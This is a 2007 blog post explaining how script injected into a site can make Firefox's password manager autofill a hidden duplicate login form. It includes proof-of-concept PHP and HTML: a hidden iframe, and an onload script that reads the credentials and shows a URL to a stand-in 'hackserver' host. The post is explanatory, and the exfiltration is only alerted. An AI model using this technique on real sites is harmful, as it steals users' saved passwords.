Demonstrating Password Manager Almost Vulnerability in FireFox

Jul 28, 2007 javascript security
This post is more than 18 months old. Since technology changes too rapidly, this content may be out of date (but that's not always the case). Please remember to verify any technical or programming information with the current release.

The “security guys” have been talking about the problems with FireFox’s password manager and I got curious. It turns out that javascript can access saved passwords in your password manager simply by creating a login form and capturing the input field’s contents.

While this isn’t necessarily a vulnerability in FireFox, it does suck! The biggest attack vector is websites that allow user submitted content that have script injection holes. Basically, if a third party can create a form and insert some javascript on the page, they will be ‘acting’ to the browser as if they’re a legitimate part of the site. Let’s check out a proof of concept:

First off, we have legitimate site here with its login form:

index.php
<h1>Log In:</h1>

<form action="login.php" name="login" method="post">
  Username: <input type="text" name="username"></input><br></br>
  Password: <input type="password" name="password"></input><br></br>
  <input type="submit"></input>
</form>

And then we process the login (which allows firefox to save the password) and redirect to a standard page.

login.php
/**
 * yay logged in
 */
die(header("Location: loggedin.php"));

and my logged in page.

loggedin.php
You're logged in now.

<a href="index.php">Log in again</a><br></br>
<a href="hack.php">Hack it</a>

As you can see, we can go back to the index.php page with the login form to verify that the password manager has saved our password.

Let’s move on to the hack.php page which is the page that had a vulnerability that allowed the third party to insert some content.

hack.php
Here is a normal page.  Don't feel scared.

<iframe src="iframe.php" style="visibility: hidden"></iframe>

In theory, you’d have to also have a file named iframe.php on the same server. I just separated it to keep the code separate. In a real life example, we’d be inserting the content of iframe.php inside of a div so it runs directly from that server. But anyways…

The evil code:

iframe.php
<html>
  <body onload="stealit()">
    <form action="login.php" name="login" method="post">
      Username: <input type="text" name="username"></input><br></br>
      Password: <input type="password" name="password"></input><br></br>
    </form>
    <script>
      function stealit()
      {
        var username=document.login.username.value;
        var password=document.login.password.value;
        
         alert(
           "I am gonna do this:  self.location.href='http://hackserver.php?username=" 
           + username + "&amp;password=" + password + "'"
         );
      }
    </script>
  </body>
</html>

As you see, this makes an identical login form so that Firefox fills it in (firefox is doing its job! Don’t be tooo mad). Then, my script could go and make a request at a remote server with the username and password using ajax or loading an image or anything really. (Here I just alert it.)

While I’m excited to see what Firefox is going to do to help stop this type of issue, I’m not mad and don’t really think its that much of a bug. When you use password manager, you KNOW what its going to do.

Go to All Posts